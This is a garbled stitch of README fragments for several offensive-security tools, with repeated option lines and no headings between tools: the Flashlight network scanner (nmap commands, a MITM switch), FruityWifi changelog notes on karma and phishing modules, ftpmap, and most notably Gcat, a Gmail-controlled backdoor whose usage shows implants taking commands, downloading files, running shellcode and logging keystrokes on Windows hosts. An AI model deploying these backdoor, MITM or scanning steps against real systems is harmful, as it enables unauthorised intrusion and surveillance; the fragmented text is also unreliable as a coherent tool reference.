• -n, --nmap-optimize: It is used to optimize nmap scan.
• -v, --verbose: It is used to list detailed information.
• -V, --version: It specifies version of the program. 
 discover up IP addresses before the actual vulnerability scan. It is used for active scan.
• -g <DefaultGateway>, --gateway < DefaultGateway >: It identifies the IP address of the gateway. If not set, interface with “-I” parameter is chosen.
• -l <LogFile>, --log < LogFile >: It specifies the log file to save the scan results. If not set, logs are saved in “flashlight.log” file in working directory.
• -k <PassiveTimeout>, --passive_timeout <PassiveTimeout>: It specifies the timeout for sniffing in passive mode. Default value is 15 seconds. This parameter is used for passive scan.
• -m, --mim: It is used to perform MITM attack.
• -n, --nmap-optimize: It is used to optimize nmap scan.
• -v, --verbose: It is used to list detailed information.
• -V, --version: It specifies version of the program. 

Videos :

Installation

apt-get install nmap tshark tcpdump dsniff

1) Passive Scan

./flashlight.py -s passive -p passive-pro-01 -i eth0 -o /root/Desktop/flashlight_test -l /root/Desktop/log –v

2) Active Scan

   - 21, 22, 23, 25, 80, 443, 445, 3128, 8080

   - 53, 161

   - http-enum

./flashlight.py -p active-project -s active -d 192.168.74.0/24 –t 30 -a -v

• Operating System Scan: /usr/bin/nmap -n -Pn -O -T5 -iL /tmp/"IPListFile" -oA /root/Desktop/flashlight/output/active-project/nmap/OsScan-"Date"
• Ping Scan: /usr/bin/nmap -n -sn -T5 -iL /tmp/"IPListFile" -oA /root/Desktop/flashlight/output/active-project/nmap/PingScan-"Date"
• Port Scan: /usr/bin/nmap -n -Pn -T5 --open -iL /tmp/"IPListFile" -sS -p T:21,22,23,25,80,443,445,3128,8080,U:53,161 -sU -oA /root/Desktop/flashlight/output/active-project/nmap/PortScan-"Date"
• Script Scan: /usr/bin/nmap -n -Pn -T5 -iL /tmp/"IPListFile" -sS -p T:21,22,23,25,80,443,445,3128,8080,U:53,161 -sU --script=default,http-enum -oA /root/Desktop/flashlight/output/active-project/nmap/ScriptScan-"Date" 

 3) Screen Scan

4) Filtering

• Windows hosts
• Top 10 DNS requests

• Wireless service has been replaced by AP module
• Mobile support has been added
• Bootstrap support has been added
• Token auth has been added
• minor fix

• Hostapd Mana support has been added
• Phishing service has been replaced by phishing module
• Karma service has been replaced by karma module
• Sudo has been implemented (replacement for danger)
• Logs path can be changed
• Squid dependencies have been removed from FruityWifi installer
• Phishing dependencies have been removed from FruityWifi installer
• New AP options available: hostapd, hostapd-mana, hostapd-karma, airmon-ng
• Domain name can be changed from config panel
• New install options have been added to install-FruityWifi.sh
• Install/Remove have been updated

./configure
make
make install

ftpmap -s ftp.c9x.org

ftpmap -P 2121 -s 127.0.0.1

ftpmap -u joe -p joepass -s ftp3.c9x.org

git clone git://github.com/Hypsurus/ftpmap 

• A Gmail account (Use a dedicated account! Do not use your personal one!)
• Turn on "Allow less secure apps" under the security settings of the account

• gcat.py a script that's used to enumerate and issue commands to available clients
• implant.py the actual backdoor to deploy

Gcat

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -id ID                Client to target
  -jobid JOBID          Job id to retrieve

  -list                 List available clients
  -info                 Retrieve info on specified client

Commands:
  Commands to execute on an implant

  -cmd CMD              Execute a system command
  -download PATH        Download a file from a clients system
  -exec-shellcode FILE  Execute supplied shellcode on a client
  -screenshot           Take a screenshot
  -lock-screen          Lock the clients screen
  -force-checkin        Force a check in
  -start-keylogger      Start keylogger
  -stop-keylogger       Stop keylogger

• Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:

#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86

• Let's issue a command to an implant:

#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv

• Lets get the results!

#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv     
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'


Windows IP Configuration

        Host Name . . . . . . . . . . . . : unknown-2d44b52
        Primary Dns Suffix  . . . . . . . : 
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No

-- SNIP --

• That's the gist of it! But you can do much more as you can see from the usage of the script! ;)

• Python 2.7
• PyQt4, tweepy, geopy, ca_certs_locater, python-instagram
• Works on Linux, Windows, Mac OSX, BSD

git clone https://github.com/Pinperepette/Geotweet_GUI.git
cd Geotweet_GUI
chmode +x Geotweet.py
sudo apt-get install python-pip
sudo pip install tweepy
sudo pip install geopy
sudo pip install ca_certs_locater
sudo pip install python-instagram
python ./Geotweet.py

$ python gethead.py http://domain.com

• Written in Python 2.7.5
• Performs HTTP Header Analysis
• Reports Header Vulnerabilities

• Support for git updates
• Support for Python 3.3
• Complete Header Analysis
• Additional Logic for Severity Classifications
• Rank Vulnerabilities by Severity
• Export Findings with Description, Impact, Execution, Fix, and References
• Export with multi-format options (XML, HTML, TXT)

• Replay and Inline Upstream Proxy support to import into other tools
• Scan domains, sub-domains, and multi-services
• Header Injection and Fuzzing functionality
• HTTP Header Policy Bypassing
• Modularize and port to more platforms
  (e.g. gMinor, Kali, Burp Extension, Metasploit, Chrome, Firefox)

• If you need to extract all data and metadata hidden in an image in a fully automated way
• If you need to analyze a lot of images and you have not much time to read the report for all them
• If you need to search a bunch of images for some metadata
• If you need to geolocate a bunch of images and see them in a map
• If you have an hash list of "special" images and you want to search for them

pip3 install pinggraph

gping [yourhost]

• ASP
• JSP
• Perl
• PHP
• Python
• Other (looks for suspicious comments, etc)